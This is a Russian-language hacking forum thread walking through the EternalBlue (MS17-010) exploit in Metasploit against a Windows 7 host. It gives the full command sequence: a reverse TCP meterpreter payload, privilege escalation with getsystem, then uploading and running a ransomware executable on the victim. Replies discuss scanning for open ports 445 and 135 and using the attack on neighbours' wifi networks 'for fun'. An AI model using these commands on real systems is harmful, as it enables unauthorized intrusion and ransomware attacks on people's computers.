Загрузка...

EternalBlue - Windows PC Hack

Thread in Security created by tigo May 28, 2017. 8546 views

  1. tigo
    tigo Topic starter May 28, 2017 160 Nov 10, 2016
    Всем привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

    [IMG]

    В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.

    Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.

    Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

    > msfupdate

    [IMG]

    > msfconsole

    > use exploit/windows/smb/ms17_010_eternalblue

    > msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

    > msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

    > msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

    > msf exploit(ms17_010_eternalblue) >exploit

    [IMG]


    Эксплоит срабатывает на отлично, получаем системные привилегии:

    > getsystem

    > getuid

    [IMG]

    Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

    [IMG]

    > upload /root/ransomware.exe C:\\

    > shell

    > cd C:\\

    > ransomware.exe

    [IMG]

    И как итог:

    [IMG]

    Вот собственно, и все. Спасибо за внимание.
     
  2. bruteroid
    bruteroid May 28, 2017 16 Nov 26, 2016
    Спасибо за мануал! Вопрос следующий,каким образом просканить сеть на наличие уязвимых хостов?
     
  3. bruteroid
    bruteroid May 28, 2017 16 Nov 26, 2016
    Если я правильно понял,то нужно сканить на открытый 445 порт,верно?
     
  4. tigo
    tigo Topic starter May 28, 2017 160 Nov 10, 2016
    Да и 135 порт тоже.
     
  5. bruteroid
    bruteroid May 28, 2017 16 Nov 26, 2016
    Понял,спасибо. Поговаривают,что пробивает олн только Windows 7 x 64?
     
  6. Alex199526
    Alex199526 Feb 25, 2018 0 Feb 18, 2018
    а что делать на х32?
     
  7. capture_inactive878414
    capture_inactive878414 Jan 30, 2019 г.Актау 0 Jan 26, 2019
    server username: NT AUTHORITY\система как воити user
     
  8. Speadhoom
    Speadhoom Feb 3, 2019 Banned 18 Jan 7, 2019
    Годно! Но применяется только на "соседских wifi", если ты через wifi какой-то компании попробуешь. Нечего не выйдет т.к. там дохуя файрволов и всю сеть по-любому тестировали на данную уязвимость. Чисто по баловаться можно :frog_mm:
     
  9. capture_inactive878414
    capture_inactive878414 Apr 12, 2019 г.Актау 0 Jan 26, 2019
    если пользователя есть пароль можно подключится
     
  10. tapocheck
    tapocheck Apr 20, 2019 Banned 632 Jul 21, 2018
    Возьму на заметку
     
Top
Loading...